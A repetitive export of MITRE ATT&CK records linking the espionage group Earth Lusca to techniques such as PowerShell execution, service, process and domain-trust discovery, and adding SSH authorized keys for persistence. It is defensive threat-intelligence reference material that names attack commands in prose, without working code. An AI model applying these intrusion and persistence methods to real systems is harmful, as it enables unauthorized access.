description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used PowerShell to execute commands.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6e2b1acc-87b5-4947-a933-b376d48b126a
revoked : False
technique : PowerShell
technique_description : Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Script: Script Execution', 'Process: Process Creation', 'Process: Process Metadata', 'Command: Command Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--aae6444e-c9e5-4965-9499-8aa6d546b58e
revoked : False
technique : System Service Discovery
technique_description : Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.

Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1007
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6ef89fa5-cd74-499b-bbc0-3b0d83baeba1
revoked : False
technique : Process Discovery
technique_description : Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1057
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Process: Process Creation', 'Process: OS API Execution', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Nltest](https://attack.mitre.org/software/S0359) to obtain information about domain controllers.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a38efb2d-3014-4196-b936-326a9a65ee83
revoked : False
technique : Domain Trust Discovery
technique_description : Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1482
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'Script: Script Execution', 'Network Traffic: Network Traffic Content', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--1307fdab-a09c-4d48-a917-a76ba0113098
revoked : False
technique : SSH Authorized Keys
technique_description : Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.

Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. 

SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1098.004
matrix : mitre-attack
platform : ['Linux', 'macOS', 'IaaS', 'Network']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'File: File Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of open source tools.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a8fef3c0-796a-4995-81fe-c47336c3ddbd
revoked : False
technique : Tool
technique_description : Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1588.002
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Malware Repository: Malware Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of malware, including [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--e607a77e-5c5c-4f3e-a62d-82124a434911
revoked : False
technique : Malware
technique_description : Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1588.001
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Malware Repository: Malware Metadata', 'Malware Repository: Malware Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
